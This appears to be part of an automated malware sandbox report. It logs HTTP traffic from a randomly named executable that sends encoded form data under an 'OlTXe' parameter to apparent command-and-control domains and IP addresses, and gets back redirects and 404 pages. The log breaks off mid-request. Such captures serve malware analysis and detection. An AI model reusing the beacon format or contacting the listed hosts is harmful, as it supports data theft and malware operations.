                                        Data Raw: 4f 6c 54 58 65 3d 75 39 31 5a 44 65 78 76 6c 4e 4b 48 50 71 38 5a 79 7a 44 67 6d 65 57 52 39 52 79 55 76 33 5a 76 30 2b 37 52 50 78 6b 42 2b 4c 4e 45 6a 48 77 37 61 47 74 7a 55 4f 72 51 2f 49 61 76 57 31 42 73 2f 2b 47 54 44 4d 43 2f 44 78 6d 6b 47 65 46 37 43 4c 52 30 51 32 34 32 75 57 44 30 44 66 45 61 37 6b 4e 4b 66 4d 33 72 42 51 68 50 4c 52 66 4c 58 4b 39 6a 54 66 70 6d 76 77 53 71 66 68 71 37 35 6b 36 75 4b 76 73 6e 43 42 57 31 56 38 46 68 42 5a 4c 64 41 72 4f 79 75 4a 58 46 64 48 37 36 69 57 6b 56 73 72 32 59 43 38 67 39 7a 71 75 74 74 72 44 61 47 51 78 61 51 6c 65 30 6c 58 50 36 49 51 2f 70 53 56 5a 39 30 76 36 55 45 64 54 68 59 63 56 38 66 5a 32 30 62 50 4b 70 42 4a 47 57 43 30 33 59 62 69 2f 77 42 33 41 46 46 33 57 77 6c 66 67 4e 72 58 4a 2b 49 56 74 47 55 6f 30 32 49 52 39 70 6e 47 64 6e 51 30 48 77 73 4d 47 30 37 4a 4d 4e 36 4d 67 37 56 53 77 36 37 37 32 32 67 38 47 6d 2f 33 53 31 76 36 6d 45 76 54 78 63 34 6d 43 2f 47 31 6a 32 6e 56 52 6f 67 76 42 56 2f 73 56 5a 51 6e 44 65 4d 2f 62 67 [TRUNCATED]
                                        Data Ascii: OlTXe=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 [TRUNCATED]
                                        Sep 11, 2024 10:10:21.868042946 CEST | 1694 | OUT | Data Raw: 73 47 78 38 79 5a 55 43 58 52 39 6d 69 6c 53 61 48 6d 42 5a 38 74 47 54 45 34 49 4d 4e 4c 48 77 77 43 79 4e 37 66 38 39 6e 4a 72 35 6a 67 41 6e 62 4c 31 44 58 55 70 6c 76 7a 66 6a 67 45 4c 35 52 63 39 57 30 36 6a 53 53 32 73 37 59 75 48 47 41 6e
                                        Data Ascii: sGx8yZUCXR9milSaHmBZ8tGTE4IMNLHwwCyN7f89nJr5jgAnbL1DXUplvzfjgEL5Rc9W06jSS2s7YuHGAnuagGlW01yQllaDeCrKydc60GjVSeqlP/yP0R3C/GlaCHOEtqiGfWu8qvNXQwTdY1mVal94eDvruweGdEeTfg4sOR5HK1z6dNY2+KNIuOKRr/nEQIb+a5pWBBBNlz2Epx+Lwg8lvtgRUEAYWwo7L7hnl1UAnmAeMEM
                                        Sep 11, 2024 10:10:22.511239052 CEST | 1086 | IN | HTTP/1.1 301 Moved Permanently
                                        Connection: close
                                        content-type: text/html
                                        content-length: 795
                                        date: Wed, 11 Sep 2024 08:10:22 GMT
                                        server: LiteSpeed
                                        location: https://www.mfgamecompany.shop/lwt6/
                                        platform: hostinger
                                        panel: hpanel
                                        content-security-policy: upgrade-insecure-requests
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        17 | 192.168.2.22 | 49178 | 185.173.111.76 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:10:24.392992020 CEST | 462 | OUT | GET /lwt6/?OlTXe=j/d5AuZ+qvKLIrA4zUrVw+2CrkvGu2Abkvu2bg8Q1qFMmFYyV0FqVOqh+5a/W0db1sjnIOHkeiKnBLtde7l1JWY97ka7LeQptngAefCJEWxKZG7LUP9THac9rEGk&th=XXRlJ2 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.mfgamecompany.shop
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:10:25.061925888 CEST | 1227 | IN | HTTP/1.1 301 Moved Permanently
                                        Connection: close
                                        content-type: text/html
                                        content-length: 795
                                        date: Wed, 11 Sep 2024 08:10:24 GMT
                                        server: LiteSpeed
                                        location: https://www.mfgamecompany.shop/lwt6/?OlTXe=j/d5AuZ+qvKLIrA4zUrVw+2CrkvGu2Abkvu2bg8Q1qFMmFYyV0FqVOqh+5a/W0db1sjnIOHkeiKnBLtde7l1JWY97ka7LeQptngAefCJEWxKZG7LUP9THac9rEGk&th=XXRlJ2
                                        platform: hostinger
                                        panel: hpanel
                                        content-security-policy: upgrade-insecure-requests
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        18 | 192.168.2.22 | 49179 | 203.161.43.228 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:10:30.124953985 CEST | 2472 | OUT | POST /ftr3/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.quilo.life
                                        Origin: http://www.quilo.life
                                        Referer: http://www.quilo.life/ftr3/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 2162
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 56 59 49 73 58 35 41 47 68 45 63 35 74 79 78 75 68 57 4d 52 74 50 4a 59 44 6f 62 4e 35 6a 6d 30 6c 33 2f 66 35 79 4d 41 49 32 51 66 45 53 53 73 63 45 53 58 69 6e 51 58 6f 62 34 76 65 4d 71 6c 4c 33 31 56 2b 63 61 71 33 4f 42 5a 41 61 4b 59 31 4d 6f 55 31 75 43 6d 47 73 67 51 61 4d 43 76 72 79 4e 54 6a 59 6a 7a 62 4a 76 33 71 57 31 55 6b 30 75 44 4c 6c 4d 41 41 45 37 4f 6d 61 74 6a 79 48 57 68 52 72 49 50 45 4b 35 34 5a 54 66 48 31 4d 32 64 33 50 43 64 4d 31 4d 6a 59 34 68 61 36 4c 69 45 6b 55 6a 49 69 68 73 77 6c 2b 39 58 4e 72 53 43 61 6d 44 76 46 56 49 5a 52 75 69 67 53 57 42 42 31 41 39 63 64 55 37 4d 75 35 72 57 75 4e 47 37 70 5a 71 2f 71 51 6d 63 5a 49 6f 7a 75 67 46 6f 37 44 35 6f 78 50 4f 5a 63 46 42 66 66 39 55 59 7a 6c 36 42 6b 51 6b 2f 54 79 71 48 4d 43 59 51 4c 33 30 5a 72 70 59 75 46 4b 64 30 74 38 6b 6b 54 39 33 54 39 65 71 4a 56 37 35 69 78 32 5a 49 31 71 76 35 4e 45 45 48 6a 6e 62 6c 70 39 65 6d 46 4d 35 55 5a 52 70 33 57 74 35 6a [TRUNCATED]
                                        Data Ascii: OlTXe=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 [TRUNCATED]
                                        Sep 11, 2024 10:10:30.131306887 CEST | 206 | OUT | Data Raw: 64 35 69 69 5a 4b 2f 70 36 61 6c 62 54 52 43 34 46 41 49 78 58 54 73 56 5a 43 55 4a 54 33 51 35 73 44 48 32 7a 62 4b 56 57 33 54 31 6e 72 62 41 36 42 30 32 46 4e 4b 43 50 58 78 49 6b 6f 56 4d 67 57 6e 51 42 32 75 6e 78 47 58 59 53 6f 62 74 75 4b
                                        Data Ascii: d5iiZK/p6albTRC4FAIxXTsVZCUJT3Q5sDH2zbKVW3T1nrbA6B02FNKCPXxIkoVMgWnQB2unxGXYSobtuKosz1pZY3BNzmJYxoYP7KT4OpCRtiuI+y7/Q5H1/HMMfTNvaWJnBQen+1ZxvcboqGxEDftnkrx1YxcrRNxh9UZK71/msOymxwRSoymXisSNpFbMCitA4MSaVcAC1m
                                        Sep 11, 2024 10:10:30.726289034 CEST | 658 | IN | HTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:10:30 GMT
                                        Server: Apache
                                        Content-Length: 514
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        19 | 192.168.2.22 | 49180 | 203.161.43.228 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:10:32.680532932 CEST | 717 | OUT | POST /ftr3/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.quilo.life
                                        Origin: http://www.quilo.life
                                        Referer: http://www.quilo.life/ftr3/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 202
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 56 66 6b 73 57 6f 41 47 67 6b 63 35 71 79 78 75 33 6d 4e 61 74 50 4e 36 44 6f 79 51 35 52 47 30 6c 69 62 66 35 42 30 41 50 32 51 63 51 43 54 6e 53 6b 53 4f 69 6e 51 68 6f 65 51 76 65 4e 4f 6c 5a 42 35 56 34 64 61 70 2f 65 42 62 4a 36 4b 5a 31 4d 6b 33 31 75 47 32 47 76 67 51 61 4e 2b 76 71 79 64 54 6d 39 2f 7a 66 35 76 74 39 47 31 35 6b 30 53 57 4c 6c 63 59 41 46 58 4f 6d 76 52 6a 79 57 32 68 57 36 49 50 4b 71 35 37 44 44 66 52 31 4d 33 2f 79 2b 75 4d 53 58 59 6e 46 72 63 38 77 62 47 79 70 58 66 58 6c 68 34 36 6c 61 4d 49 59 4a 2f 47 4a 51 3d 3d
                                        Data Ascii: OlTXe=2iJzcjLeEdvuVfksWoAGgkc5qyxu3mNatPN6DoyQ5RG0libf5B0AP2QcQCTnSkSOinQhoeQveNOlZB5V4dap/eBbJ6KZ1Mk31uG2GvgQaN+vqydTm9/zf5vt9G15k0SWLlcYAFXOmvRjyW2hW6IPKq57DDfR1M3/y+uMSXYnFrc8wbGypXfXlh46laMIYJ/GJQ==
                                        Sep 11, 2024 10:10:33.427598000 CEST | 658 | IN | HTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:10:33 GMT
                                        Server: Apache
                                        Content-Length: 514
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        20 | 192.168.2.22 | 49181 | 203.161.43.228 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:10:35.231431007 CEST | 2472 | OUT | POST /ftr3/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.quilo.life
                                        Origin: http://www.quilo.life
                                        Referer: http://www.quilo.life/ftr3/
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Content-Length: 3626
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Data Raw: 4f 6c 54 58 65 3d 32 69 4a 7a 63 6a 4c 65 45 64 76 75 45 50 30 73 58 50 38 47 6d 45 63 2b 76 79 78 75 68 57 4d 54 74 50 4a 36 44 6f 62 4e 35 69 71 30 6c 31 33 66 2b 69 4d 41 4a 32 51 63 62 69 53 73 63 45 53 59 69 6e 46 51 6f 62 31 59 65 50 43 6c 4c 32 31 56 2b 66 43 71 30 4f 42 5a 4e 36 4b 65 31 4d 6b 6d 31 6f 6e 2f 47 76 6c 39 61 4f 4f 76 72 41 46 54 6a 4e 2f 38 52 5a 76 74 39 47 31 31 6b 30 53 32 4c 6c 46 64 41 45 66 6b 6d 63 35 6a 79 33 57 68 5a 37 49 4d 49 71 34 77 4c 6a 66 42 31 4d 36 4a 33 50 43 5a 4d 31 49 4a 59 34 39 61 37 59 36 45 6b 58 4c 48 70 52 73 7a 70 75 39 58 53 37 53 4d 61 6d 44 6a 46 56 49 5a 52 75 65 67 55 57 42 42 31 46 42 66 41 45 37 4d 6b 5a 72 50 77 39 44 4d 70 5a 2f 63 71 51 57 4d 5a 2f 59 7a 70 69 64 6f 73 54 35 6f 6d 76 50 53 63 46 42 43 52 64 55 69 7a 6c 7a 69 6b 51 30 76 54 79 71 48 4d 42 41 51 4f 69 67 5a 69 5a 59 75 4d 71 64 35 6d 63 6b 37 54 39 7a 4c 39 65 32 4a 56 35 5a 69 77 42 6c 49 69 5a 4c 2b 43 55 45 47 6e 6e 62 6a 37 4e 66 37 46 4d 6b 50 5a 52 67 51 57 73 70 6a [TRUNCATED]
                                        Data Ascii: OlTXe=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 [TRUNCATED]
                                        Sep 11, 2024 10:10:35.236588955 CEST | 1670 | OUT | Data Raw: 64 6c 69 69 59 35 2f 6f 6d 67 6c 59 66 52 43 4b 39 41 66 51 58 54 73 6c 59 4a 65 70 54 43 61 5a 67 52 48 32 33 48 4b 58 50 43 54 42 6e 72 61 30 53 42 68 54 52 4e 50 69 50 53 77 49 6b 66 56 4a 34 2b 6e 55 63 58 75 6c 4a 38 58 70 65 6f 61 64 75 4b
                                        Data Ascii: dliiY5/omglYfRCK9AfQXTslYJepTCaZgRH23HKXPCTBnra0SBhTRNPiPSwIkfVJ4+nUcXulJ8XpeoaduKsvajtZZ8RdzhJYwPYPzGT6a5CQ1iuKWy6PQ4Nl/JJMfFNvHyJnZueja1ZxzcbMKG4kDflHkzvlYSD7VOxhUXDrHUoWAarCVLIDUmuVive5pmUYG+4xh0Q8pYNnslDd1A20Ubb16BmP/pPZaZoH8XORN11a0WjuJ2l
                                        Sep 11, 2024 10:10:35.875650883 CEST | 658 | IN | HTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:10:35 GMT
                                        Server: Apache
                                        Content-Length: 514
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        21 | 192.168.2.22 | 49182 | 203.161.43.228 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:10:37.855438948 CEST | 454 | OUT | GET /ftr3/?OlTXe=7ghTfXuNFdv7bt0cffwS+GQv8BggimAttJoldp68xQSgk3fAwjETfWJmY0r3VEazrWArn7FbDu6sdwx26ciS++knKqqM0OcB3qa3ON8TTY6A6Cdgot3Jd9OI6yIP&th=XXRlJ2 HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.quilo.life
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                        Sep 11, 2024 10:10:38.516591072 CEST | 673 | IN | HTTP/1.1 404 Not Found
                                        Date: Wed, 11 Sep 2024 08:10:38 GMT
                                        Server: Apache
                                        Content-Length: 514
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 65 74 63 68 22 3e [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="site"><div class="sketch"><div class="bee-sketch red"></div><div class="bee-sketch blue"></div></div><h1>404:<small>Players Not Found</small></h1></div>... partial --> </body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        22 | 192.168.2.22 | 49183 | 161.97.168.245 | 80 | 1544 | C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 11, 2024 10:10:43.572134972 CEST | 2472 | OUT | POST /wjff/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
